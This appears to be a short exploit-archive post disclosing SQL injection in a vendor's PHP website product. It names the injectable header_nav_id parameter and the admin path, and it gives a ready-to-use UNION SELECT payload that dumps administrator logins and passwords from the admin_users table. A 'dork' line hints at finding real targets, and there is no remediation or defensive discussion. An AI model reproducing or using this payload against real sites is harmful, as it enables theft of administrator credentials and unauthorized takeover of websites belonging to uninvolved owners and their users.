id: 12236
date: 05/14/2010
title: Web Design Solutions SQL Injection Vulnerabilities
author: n/a
cves: 

==================================================
Web Design Solutions SQL Injection Vulnerabilities
==================================================

######################JAI HIND ######################
 
[~] Tybe: SQL Injection Vulnerabilities
 
[~] Vendor: http://www.webdesignsolution.co.uk
 
[~] D0rk: Us3 ur brain
 
======================================================================================
# SQL Injection #
======================================================================================
 
http://127.0.0.1/index.php?header_nav_id= [SQLI]
 
 
admin link:
 
http://127.0.0.1/admin
 
 
proof = http://site.com/index.php?header_nav_id=-1 union all select
1,2,3,4,5,6,7,group_concat(login,0x3a,password) from admin_users--



#  0day.today [2023-03-21]  #